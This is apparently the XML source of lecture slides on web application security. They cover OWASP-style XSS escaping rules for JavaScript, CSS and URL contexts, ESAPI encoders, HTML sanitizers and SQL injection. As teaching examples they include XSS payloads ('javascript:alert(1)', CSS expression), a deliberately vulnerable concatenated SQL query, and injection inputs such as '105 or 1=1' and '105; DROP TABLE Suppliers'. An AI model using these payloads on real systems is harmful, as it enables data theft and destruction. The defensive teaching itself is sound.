      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)&lt;/script&gt; inside a quoted string </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;x='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt; one side of a quoted expression </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="x='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&lt;/div&gt; inside quoted event handler</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 there are some JavaScript functions that can never safely use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data as input - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>EVEN IF JAVASCRIPT ESCAPED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>window.setInterval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...EVEN IF YOU ESCAPE UNTRUSTED DATA YOU ARE XSSED HERE...'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>); &lt;/script&gt;</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for Java Script.</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String safe = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ESAPI.encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeForJavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( "input" )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CSS Escape And Strictly Validate Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> Data into HTML Style Property Values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> When you want to put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or a style tag. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSS is surprisingly powerful, and can be used for numerous attacks. Therefore, it's important that you only use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data in a property </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and not into other places in style data. You should stay away from putting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data into complex properties like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, behavior, and custom (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>moz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-binding). You should also not put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data into IE’s expression property value which allows JavaScript.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CCS - XSS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&lt;style&gt;selector { property : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>; } &lt;/style&gt; property value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;style&gt;selector { property : "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"; } &lt;/style&gt; property value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;span style="property : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;text&lt;/span&gt; property value</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note there are some CSS contexts that can never safely use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data as input - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>EVEN IF PROPERLY CSS ESCAPED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>! You will have to ensure that URLs only start with "http" not "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" and that properties never start with "expression".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>{ background-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> : "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(1)"; } // and all other URLs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>{ text-size: "expression(alert('XSS'))"; } // only in IE</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for CSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ESAPI reference implementation of CSS escaping and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unescaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String safe = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ESAPI.encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeForCSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( "input" )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URL Escape Before Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data into HTML URL Parameter Values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> when you want to put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data into HTTP GET parameter value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="http://www.somesite.com?test=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;link&lt;/a &gt; </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11680"/>
            <a:ext cx="8229600" cy="4389120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the %HH escaping format. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data in data: URLs should not be allowed as there is no good way to disable attacks with escaping to prevent switching out of the URL. All attributes should be quoted. Unquoted attributes can be broken out of with many characters including [space] % * + , - / ; &lt; = &gt; ^ and |. Note that entity encoding is useless in this context.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for URLs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pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String safe = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ESAPI.encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>encodeForURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( "input" )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Cross-site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a vulnerability within a website or web application that the victim would visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>While XSS can be taken advantage of within VBScript, ActiveX and Flash (although now considered legacy or even obsolete), unquestionably, the most widely abused is JavaScript – primarily because JavaScript is fundamental to most browsing experiences.</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Sanitize HTML Markup with a Library Designed for the Job</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If your application handles markup -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text. There are several available at OWASP that are simple to use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>HtmlSanitizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/mganss/HtmlSanitizer</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Sanitize HTML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 open-source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> library. The HTML is cleaned with a white list approach. All allowed tags and attributes can be configured. The library is unit tested with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OWASP XSS Filter Evasion Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" b="1" dirty="0" smtClean="0"/>
              <a:t>OWASP Java HTML Sanitizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project</a:t>
            </a:r>
            <a:endParaRPr lang="fi-FI" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fi-FI" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Ruby on Rails </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>SanitizeHelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When SQL is used to display data on a web page, it is common to let web users input their own search values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Since SQL statements are text only, it is easy, with a little piece of computer code, to dynamically change SQL statements to provide the user with selected data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtUserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>getRequestString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = "SELECT * FROM Users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtUserId</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Injection	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injected SQL commands can alter SQL statement and compromise the security of a web application.</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8229600" cy="1008888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection Based on 1=1 is Always True</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let's say that the original purpose of the code was to create an SQL statement to select a user with a given user id.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: 105 or 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server Result: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM Users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = 105 or 1=1</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SQL above is valid. It will return all rows from the table Users, since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>WHERE 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is always true.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.</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Example: </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UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>105; DROP TABLE Suppliers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server Code: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtUserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>getRequestString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>txtSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = "SELECT * FROM Users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserId</a:t>
            </a:r>
